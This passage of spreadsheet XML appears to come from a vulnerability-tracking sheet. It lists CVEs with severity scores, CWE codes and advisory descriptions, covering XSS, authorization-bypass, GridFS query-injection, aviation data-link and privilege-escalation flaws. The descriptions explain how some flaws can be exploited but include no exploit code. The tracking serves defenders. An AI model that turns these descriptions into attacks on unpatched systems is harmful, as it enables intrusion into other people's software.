Because JsonTool::encode() uses JSON_UNESCAPED_SLASHES, an attacker-controlled value containing a closing &lt;/script&gt; sequence could terminate the surrounding script element and inject arbitrary HTML or JavaScript. For example, a specially crafted viewEventAttributes URL could contain malicious content in one of the affected filter parameters.
An attacker could exploit the vulnerability by convincing an authenticated MISP user to follow a crafted URL. Successful exploitation would execute attacker-controlled JavaScript in the security context of the MISP instance and with the privileges of the victim's authenticated browser session. This could allow access to information available to the victim, modification of data through authenticated requests, or other actions permitted by the victim's MISP permissions.
The vulnerability is addressed by applying HTML escaping with h() to both scalar and array values before they are inserted into the DOM.</t>
        </is>
      </c>
      <c r="M4360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85227</t>
        </is>
      </c>
    </row>
    <row r="4361">
      <c r="A4361" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85229</t>
        </is>
      </c>
      <c r="C4361" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4361" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4361" s="5" t="inlineStr"/>
      <c r="F4361" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4361" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H4361" s="5" t="inlineStr"/>
      <c r="I4361" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4361" s="5" t="inlineStr"/>
      <c r="K4361" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4361" s="5" t="inlineStr">
        <is>
          <t>** UNSUPPORTED WHEN ASSIGNED ** Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Apache SkyWalking Booster UI.
This issue affects Apache SkyWalking UI : from 10.2.0 through 10.4.0.
Users are recommended to upgrade to Horizon UI 1.0.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M4361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85229</t>
        </is>
      </c>
    </row>
    <row r="4362">
      <c r="A4362" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85484</t>
        </is>
      </c>
      <c r="C4362" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4362" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4362" s="5" t="inlineStr"/>
      <c r="F4362" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4362" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4362" s="5" t="inlineStr"/>
      <c r="I4362" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4362" s="5" t="inlineStr"/>
      <c r="K4362" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4362" s="5" t="inlineStr">
        <is>
          <t>HTML::FormHandler versions before 0.410002 for Perl render option group labels and radio button labels into HTML without escaping.
The Select, RadioGroup, CheckboxGroup and HorizCheckboxGroup widgets render a group label unescaped, Select into a label attribute and the other three into element content. RadioGroup also renders each radio button's own label unescaped.
Any application whose option list is built from data rather than literals, using options_from, an options_fieldname method, or the DBIC model, allows attacker-influenced text in a label that can override the options or embed JavaScript in rendered pages.</t>
        </is>
      </c>
      <c r="M4362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85484</t>
        </is>
      </c>
    </row>
    <row r="4363">
      <c r="A4363" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85485</t>
        </is>
      </c>
      <c r="C4363" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4363" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4363" s="5" t="inlineStr"/>
      <c r="F4363" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4363" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4363" s="5" t="inlineStr"/>
      <c r="I4363" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4363" s="5" t="inlineStr"/>
      <c r="K4363" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4363" s="5" t="inlineStr">
        <is>
          <t>HTML::FormHandler versions before 0.410002 for Perl render some error messages into HTML without escaping.
The Table form layout and the Bootstrap 2 and 3 wrappers splice each error string straight into the surrounding markup. Version 0.410000, the fix for CVE-2026-19872, escaped the equivalent values in the other layouts and wrappers, and 0.410002 extended that to these three.
Error messages that contain attacker-influenced content such as rejected field values could embed JavaScript in rendered pages.</t>
        </is>
      </c>
      <c r="M4363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85485</t>
        </is>
      </c>
    </row>
    <row r="4364">
      <c r="A4364" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85630</t>
        </is>
      </c>
      <c r="C4364" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4364" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4364" s="5" t="inlineStr"/>
      <c r="F4364" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4364" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4364" s="5" t="inlineStr"/>
      <c r="I4364" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4364" s="5" t="inlineStr"/>
      <c r="K4364" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4364" s="5" t="inlineStr">
        <is>
          <t>HTML::FormHandler versions before 0.410002 for Perl render field attributes into HTML without escaping using the process_attrs method.
Any application with fields or field labels where some attributes are built from data rather than literals allows attacker-influenced text in an attribute value that can override the field attributes or embed JavaScript in rendered pages.
For example, the RadioGroup widget uses the process_attrs method via the render_option and wrap_radio methods.</t>
        </is>
      </c>
      <c r="M4364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85630</t>
        </is>
      </c>
    </row>
    <row r="4365">
      <c r="A4365" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85645</t>
        </is>
      </c>
      <c r="C4365" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4365" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4365" s="5" t="inlineStr"/>
      <c r="F4365" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4365" s="5" t="inlineStr"/>
      <c r="H4365" s="5" t="inlineStr"/>
      <c r="I4365" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4365" s="5" t="inlineStr"/>
      <c r="K4365" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4365" s="5" t="inlineStr">
        <is>
          <t>The Form Maker by 10Web – Mobile-Friendly Drag &amp; Drop Contact Form Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the bulk_action parameter in all versions up to, and including, 1.15.46 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.</t>
        </is>
      </c>
      <c r="M4365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85645</t>
        </is>
      </c>
    </row>
    <row r="4366">
      <c r="A4366" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86254</t>
        </is>
      </c>
      <c r="C4366" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4366" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4366" s="5" t="inlineStr"/>
      <c r="F4366" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4366" s="5" t="inlineStr"/>
      <c r="H4366" s="5" t="inlineStr"/>
      <c r="I4366" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4366" s="5" t="inlineStr"/>
      <c r="K4366" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4366" s="5" t="inlineStr">
        <is>
          <t>wger versions through master contain an incomplete authorization bypass in wger/core/views/user.py where three views retain the original gym-scope check using raw integer comparison instead of the is_same_gym() helper, allowing gym staff with gym=None to delete, deactivate, or activate any other user with gym=None. Attackers with gym.manage_gym permission and gym=None affiliation can permanently delete user accounts, lock users out via deactivation, or undo defensive deactivations by exploiting the None != None comparison edge case.</t>
        </is>
      </c>
      <c r="M4366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86254</t>
        </is>
      </c>
    </row>
    <row r="4367">
      <c r="A4367" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87640</t>
        </is>
      </c>
      <c r="C4367" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4367" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4367" s="5" t="inlineStr"/>
      <c r="F4367" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4367" s="5" t="inlineStr"/>
      <c r="H4367" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I4367" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4367" s="5" t="inlineStr"/>
      <c r="K4367" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4367" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in WebView in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to read memory outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87640</t>
        </is>
      </c>
    </row>
    <row r="4368">
      <c r="A4368" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88023</t>
        </is>
      </c>
      <c r="C4368" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4368" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4368" s="5" t="inlineStr"/>
      <c r="F4368" s="5" t="inlineStr"/>
      <c r="G4368" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H4368" s="5" t="inlineStr"/>
      <c r="I4368" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4368" s="5" t="inlineStr"/>
      <c r="K4368" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L4368" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB PHP Library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M4368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88023</t>
        </is>
      </c>
    </row>
    <row r="4369">
      <c r="A4369" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88024</t>
        </is>
      </c>
      <c r="C4369" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4369" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4369" s="5" t="inlineStr"/>
      <c r="F4369" s="5" t="inlineStr"/>
      <c r="G4369" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H4369" s="5" t="inlineStr"/>
      <c r="I4369" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4369" s="5" t="inlineStr"/>
      <c r="K4369" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L4369" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB Rust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M4369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88024</t>
        </is>
      </c>
    </row>
    <row r="4370">
      <c r="A4370" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88025</t>
        </is>
      </c>
      <c r="C4370" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4370" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4370" s="5" t="inlineStr"/>
      <c r="F4370" s="5" t="inlineStr"/>
      <c r="G4370" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H4370" s="5" t="inlineStr"/>
      <c r="I4370" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4370" s="5" t="inlineStr"/>
      <c r="K4370" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L4370"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M4370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88025</t>
        </is>
      </c>
    </row>
    <row r="4371">
      <c r="A4371" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88029</t>
        </is>
      </c>
      <c r="C4371" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4371" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4371" s="5" t="inlineStr"/>
      <c r="F4371" s="5" t="inlineStr"/>
      <c r="G4371" s="5" t="inlineStr">
        <is>
          <t>python, mongodb</t>
        </is>
      </c>
      <c r="H4371" s="5" t="inlineStr"/>
      <c r="I4371" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4371" s="5" t="inlineStr"/>
      <c r="K4371" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L4371" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB Python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M4371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88029</t>
        </is>
      </c>
    </row>
    <row r="4372">
      <c r="A4372" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88030</t>
        </is>
      </c>
      <c r="C4372" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4372" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4372" s="5" t="inlineStr"/>
      <c r="F4372" s="5" t="inlineStr"/>
      <c r="G4372" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H4372" s="5" t="inlineStr"/>
      <c r="I4372" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4372" s="5" t="inlineStr"/>
      <c r="K4372" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L4372" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB Ruby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M4372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88030</t>
        </is>
      </c>
    </row>
    <row r="4373">
      <c r="A4373" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88031</t>
        </is>
      </c>
      <c r="C4373" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4373" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4373" s="5" t="inlineStr"/>
      <c r="F4373" s="5" t="inlineStr"/>
      <c r="G4373" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H4373" s="5" t="inlineStr"/>
      <c r="I4373" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4373" s="5" t="inlineStr"/>
      <c r="K4373" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L4373" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB Go Driver can cause a caller-supplied structured file identifier to be interpreted as a query condition rather than as a literal identifier. An authenticated user who can influence the identifier passed by an affected application may cause all GridFS file chunks in the affected bucket to be removed, rendering stored file content unreadable.</t>
        </is>
      </c>
      <c r="M4373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88031</t>
        </is>
      </c>
    </row>
    <row r="4374">
      <c r="A4374" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88033</t>
        </is>
      </c>
      <c r="C4374" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4374" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4374" s="5" t="inlineStr"/>
      <c r="F4374" s="5" t="inlineStr"/>
      <c r="G4374" s="5" t="inlineStr">
        <is>
          <t>java, mongodb</t>
        </is>
      </c>
      <c r="H4374" s="5" t="inlineStr"/>
      <c r="I4374" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4374" s="5" t="inlineStr"/>
      <c r="K4374" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L4374" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB Java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M4374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88033</t>
        </is>
      </c>
    </row>
    <row r="4375">
      <c r="A4375" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88034</t>
        </is>
      </c>
      <c r="C4375" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4375" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4375" s="5" t="inlineStr"/>
      <c r="F4375" s="5" t="inlineStr"/>
      <c r="G4375" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H4375" s="5" t="inlineStr"/>
      <c r="I4375" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4375" s="5" t="inlineStr"/>
      <c r="K4375" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L4375"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M4375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88034</t>
        </is>
      </c>
    </row>
    <row r="4376">
      <c r="A4376" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88036</t>
        </is>
      </c>
      <c r="C4376" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4376" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4376" s="5" t="inlineStr"/>
      <c r="F4376" s="5" t="inlineStr"/>
      <c r="G4376" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H4376" s="5" t="inlineStr"/>
      <c r="I4376" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4376" s="5" t="inlineStr"/>
      <c r="K4376" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L4376"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M4376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88036</t>
        </is>
      </c>
    </row>
    <row r="4377">
      <c r="A4377" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4377" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-6717</t>
        </is>
      </c>
      <c r="C4377" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4377" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4377" s="5" t="inlineStr"/>
      <c r="F4377" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4377" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4377" s="5" t="inlineStr"/>
      <c r="I4377" s="5" t="inlineStr">
        <is>
          <t>2024-04-25</t>
        </is>
      </c>
      <c r="J4377" s="5" t="inlineStr"/>
      <c r="K4377" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4377" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the SAML client registration in Keycloak that could allow an administrator to register malicious JavaScript URIs as Assertion Consumer Service POST Binding URLs (ACS), posing a Cross-Site Scripting (XSS) risk. This issue may allow a malicious admin in one realm or a client with registration access to target users in different realms or applications, executing arbitrary JavaScript in their contexts upon form submission. This can enable unauthorized access and harmful actions, compromising the confidentiality, integrity, and availability of the complete KC instance.</t>
        </is>
      </c>
      <c r="M4377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-6717</t>
        </is>
      </c>
    </row>
    <row r="4378">
      <c r="A4378" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4378" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71410</t>
        </is>
      </c>
      <c r="C4378" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4378" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4378" s="5" t="inlineStr"/>
      <c r="F4378" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4378" s="5" t="inlineStr"/>
      <c r="H4378" s="5" t="inlineStr"/>
      <c r="I4378" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J4378" s="5" t="inlineStr"/>
      <c r="K4378" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L4378" s="5" t="inlineStr">
        <is>
          <t>Unnumbered Disconnect (U DISC) and malformed Aviation Very High Frequency Link Control frames can terminate sessions and lead to a loss of CPDLC functions requiring a reversion to voice communication and increased controller workload. This type of attack can be carried out remotely over radio frequency.</t>
        </is>
      </c>
      <c r="M4378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71410</t>
        </is>
      </c>
    </row>
    <row r="4379">
      <c r="A4379" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4379" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71411</t>
        </is>
      </c>
      <c r="C4379" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4379" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4379" s="5" t="inlineStr"/>
      <c r="F4379" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4379" s="5" t="inlineStr"/>
      <c r="H4379" s="5" t="inlineStr"/>
      <c r="I4379" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J4379" s="5" t="inlineStr"/>
      <c r="K4379" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L4379" s="5" t="inlineStr">
        <is>
          <t>Broadcast control frames can disconnect multiple aircraft simultaneously leading to delayed clearances and air traffic controller overload. This type of attack can be carried out remotely over radio frequency.</t>
        </is>
      </c>
      <c r="M4379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71411</t>
        </is>
      </c>
    </row>
    <row r="4380">
      <c r="A4380" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4380" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71413</t>
        </is>
      </c>
      <c r="C4380" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4380" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4380" s="5" t="inlineStr"/>
      <c r="F4380" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4380" s="5" t="inlineStr"/>
      <c r="H4380" s="5" t="inlineStr"/>
      <c r="I4380" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J4380" s="5" t="inlineStr"/>
      <c r="K4380" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="L4380" s="5" t="inlineStr">
        <is>
          <t>Malformed or out-of-sequence frames at the Aviation Very High Frequency Link Control X.25 layers cause repeated resets which may result in increased workload and reduced situational awareness. This type of attack can be carried out remotely over radio frequency.</t>
        </is>
      </c>
      <c r="M4380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71413</t>
        </is>
      </c>
    </row>
    <row r="4381">
      <c r="A4381" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0294</t>
        </is>
      </c>
      <c r="C4381" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4381" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4381" s="5" t="inlineStr"/>
      <c r="F4381" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4381" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, palo alto</t>
        </is>
      </c>
      <c r="H4381" s="5" t="inlineStr">
        <is>
          <t>apple:macos, microsoft:windows, paloaltonetworks:prisma_access_agent</t>
        </is>
      </c>
      <c r="I4381" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J4381" s="5" t="inlineStr"/>
      <c r="K4381" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="L4381" s="5" t="inlineStr">
        <is>
          <t>A privilege escalation (PE) vulnerability in the Palo Alto Networks Prisma® Access Agent app on Windows and macOS devices enables a local user to execute code with elevated privileges. 
The Prisma Access Agent on Linux, iOS, Android, and ChromeOS is not affected.</t>
        </is>
      </c>
      <c r="M4381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0294</t>
        </is>
      </c>
    </row>
    <row r="4382">
      <c r="A4382" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16172</t>
        </is>
      </c>
      <c r="C4382" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4382" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4382" s="5" t="inlineStr"/>
      <c r="F4382" s="5" t="inlineStr"/>
      <c r="G4382" s="5" t="inlineStr"/>
      <c r="H4382" s="5" t="inlineStr"/>
      <c r="I4382" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4382" s="5" t="inlineStr"/>
      <c r="K4382" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4382" s="5" t="inlineStr">
        <is>
          <t>Netskope was notified of an out-of-bounds heap read affecting the Endpoint DLP (EPDLP) service of the Netskope Client. A local standard user could potentially send a specially crafted message that is not properly validated with a bounds check, likely crashing the kernel driver handler. Successful exploitation could potentially crash the EPDLP service, temporarily interrupting DLP enforcement. A successful exploit could potentially also reveal per-boot memory layout information to unauthorized users.</t>
        </is>
      </c>
      <c r="M4382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16172</t>
        </is>
      </c>
    </row>
    <row r="4383">
      <c r="A4383" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16481</t>
        </is>
      </c>
